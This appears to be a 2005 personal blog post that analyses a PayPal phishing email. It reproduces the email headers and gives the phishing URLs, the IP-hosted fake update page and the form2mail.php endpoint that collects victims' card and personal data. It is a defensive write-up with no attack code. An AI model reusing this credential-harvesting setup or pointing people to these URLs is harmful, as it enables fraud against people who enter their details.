 Today I got an obviously fraudulent email claiming I need to "update my account information" at PayPal. The site it links to has entry fields for all sorts of personal information, plus credit card account information. I don't have a PayPal account. This isn't the first I've gotten something like this, but here are the details for this one.
Screenshot of the email as it appears in my Hotmail account
The header.
X-Message-Status: sF
X-SID-PRA: service@paypal.com
X-SID-Result: SoftFail
X-Message-Info: JGTYoYF78jHcoG/t78wIKx930QsXgE4UFFf2cdDtg3Q=
Received: from EV1SERVE-GDKQQ6 ([69.57.136.63]) by mc3-f21.hotmail.com with Microsoft SMTPSVC(6.0.3790.211);
Tue, 15 Mar 2005 16:23:19 -0800
From: "service@paypal.com"
Subject: Account Verification.
To: USERNAME@hotmail.com
Content-Type: text/html;iso-8859-1
Reply-To: service@paypal.com
Date: Tue, 15 Mar 2005 18:23:20 -0600
X-Priority: 3
X-Library: Indy 8.0.25
Return-Path: service@paypal.com
Message-ID:
X-OriginalArrivalTime: 16 Mar 2005 00:23:19.0864 (UTC) FILETIME=[5B164B80:01C529BE]
Clicking on the link to "update" your information takes to you to http://add.update.config.cmdcmd.503subscription.info:80/ and then fowards you to an ugly looking URL that can be simplified to this: http://216.51.232.128/best-greetings-flirting.com/pp/update.htm?=
If you actually go the URL, the browser doesn't get that secured lock icon. This idiot fraudster wasn't even nice enough to encrypt the information he's trying to steal. Meh.
It looks like the form submission results get posted via this http://216.51.232.128/best-greetings-flirting.com/pp/form2mail.php
form2mail.php is a form mailer implemented in PHP. Looking at the HTML source of the form on the page shows a hidden form field called "login_email" and the value is someone's AOL address. Hmmm... After some poking around, it looks like this is likely compromised Windows 2003 machine.
What's interesting is that if you go to http://216.51.232.128/best-greetings-flirting.com/pp/ , you get forwarded to theark.ws, which doesn't respond.
|
